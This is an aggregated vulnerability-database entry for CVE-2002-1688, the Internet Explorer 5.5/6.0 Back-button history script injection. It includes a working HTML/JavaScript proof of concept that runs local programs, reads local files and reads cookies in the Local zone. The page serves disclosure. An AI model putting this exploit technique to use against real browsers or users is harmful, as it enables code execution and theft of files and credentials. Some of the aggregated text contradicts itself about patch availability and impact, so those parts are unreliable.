CVE-2002-1688
CVSS 5.0
Published: 2002-12-31 00:00:00
Last modified: 2008-09-05 16:31:15
NMCOE    

[Original] The browser history feature in Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to execute arbitrary script as other users and steal authentication information via cookies by injecting JavaScript into the URL, which is executed when the user hits the Back button.


[CNNVD] Microsoft Internet Explorer History List Script Injection Vulnerability (CNNVD-200212-760)

        
        Microsoft Internet Explorer is a popular web browser developed and maintained by Microsoft.
        Microsoft Internet Explorer has a vulnerability in its handling of the history list that lets a remote attacker inject arbitrary script code into the history list and have it executed.
        Microsoft Internet Explorer stores javascript: URLs in the browser history list, and script contained in a javascript: URL runs in the security-zone context of the last viewed page. This protects against javascript: URLs embedded in a maliciously constructed web page. However, an attacker can arrange for the javascript: URL to be triggered when the user presses the 'Back' button, which causes the script in the javascript: URL to execute in the context of a different page.
        When the page reached by pressing 'Back' fails to load, the normal behaviour is to display an error page that IE runs in the Local security zone (on Windows 2000 this is res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#), so script in the javascript: URL can execute in the Local zone context or read the contents of arbitrary local files.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no effect on system integrity]
Availability impact: NONE [no effect on system availability]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:5.5      Microsoft IE 5.5
cpe:/a:microsoft:ie:5.5:sp1  Microsoft Internet Explorer 5.5 SP1
cpe:/a:microsoft:ie:5.5:sp2  Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:6.0      Microsoft Internet Explorer 6.0

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1688
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1688
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-760
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/8844
(UNKNOWN)  XF  ie-history-javascript-urls(8844)
http://www.securityfocus.com/bid/4505
(UNKNOWN)  BID  4505

- Vulnerability information

Microsoft Internet Explorer History List Script Injection Vulnerability
Medium risk  Design error
2002-12-31 00:00:00  2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        Microsoft
        ---------
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        
        http://www.microsoft.com/windows/ie/default.asp

- Vulnerability information (21376)

Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability (EDBID:21376)
windows remote
2002-04-15 Verified
0 Andreas Sandblad
N/A
source: http://www.securityfocus.com/bid/4505/info

A vulnerability has been reported in some versions of Internet Explorer. It is possible to inject JavaScript code into the browser history list, and execute it within any page context given appropriate user interaction.

Internet Explorer stores javascript: URLs in the browser history list. Script executed within the javascript: URL will inherit the security zone of the last viewed page. This provides protection against javascript: URLs included within a maliciously constructed web page. However, a user may navigate to a javascript: URL using the 'Back' button in their browser. This may result in the injected script code executing within the context of another page.

This behavior has been reported in versions 6.0 and 5.5 of IE. Other versions of Internet Explorer may share this vulnerability. This has not, however, been confirmed. 

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// A URL whose load fails, so IE shows its Local-zone error page in its place
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
function readCookie(url){
  // The double quotes around "+" are closed by the document.write("...")
  // quotes in backBug, so the fragment concatenates to </script> there while
  // keeping the literal closing tag out of this page's own script block.
  s = '<script>alert(document.cookie);close();<"+"/script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;
  page = document.location;
  // First evaluation (history.length still equals len): the string in the
  // else branch is rendered as a page whose script navigates on to url, so
  // this javascript: URL stays in the history list behind that page.
  // Pressing Back re-evaluates the URL in the zone of the page being left;
  // history.length has grown, so the payload is written into a new window.
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(\""+payload+"\")')";
  s+= ";history.back();} else '<script>location=\""+url
  s+= "\";document.title=\""+page+"\";<"+"/script>';";
  location = s;
}
</script>
</html>

- Vulnerability information

2975
Microsoft IE Back Button XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Microsoft Internet Explorer contains a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the URL upon clicking the "Back" button. This could allow a user to send a specially crafted request that would execute arbitrary code on the server leading to a loss of integrity.

- Timeline

2002-04-15 Unknown
2002-04-15 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete
 

 
